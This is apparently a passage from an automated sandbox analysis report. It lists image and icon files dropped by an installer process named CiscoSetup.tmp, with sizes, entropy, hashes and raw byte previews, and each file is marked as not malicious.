                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83426
                                                                                                                                                                                                  Entropy (8bit):7.358868361468608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                                                                                  MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                                                                                  SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                                                                                  SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                                                                                  SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                                                                                  MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                                                                                  SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                                                                                  SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                                                                                  SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                                                                                  MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                                                                                  SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                                                                                  SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                                                                                  SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                                                                                  MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                                                                                  SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                                                                                  SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                                                                                  SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                                                                                  MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                                                                                  SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                                                                                  SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                                                                                  SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                                                                                  MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                                                                                  SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                                                                                  SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                                                                                  SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                                                                                  MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                                                                                  SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                                                                                  SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                                                                                  SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P........................ne....y...s...s...s...s...s...s...y.&..`...................................................P......................................y.(...0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.......................................@................z]J.X5..M'..M'..M'..>"E...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`.........................................xh.M'..M'..M'..M'..M'..nP:.I/T...y.(...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..(.....y.&..`...............................X5..M'..M'..nP:...................y.(...0 ..0 ..0 ..=...0 ..0 ..0 ..0 ..=...0 ..0 ..0 ..(.....y.............................M'..M'..nP:...........................s.0 ..0 ..0 ..=.......WJ..0 ..0 ..WJ......J<..0 ..0 ..0 ....s.........................M'..M'...xh...............................s.0 ..0 ..0 ..0 ..WJ......WJ..WJ......WJ..0 ..0 ..0 ..0 ....s............0.......M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0468421318534369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                                                                                  MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                                                                                  SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                                                                                  SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
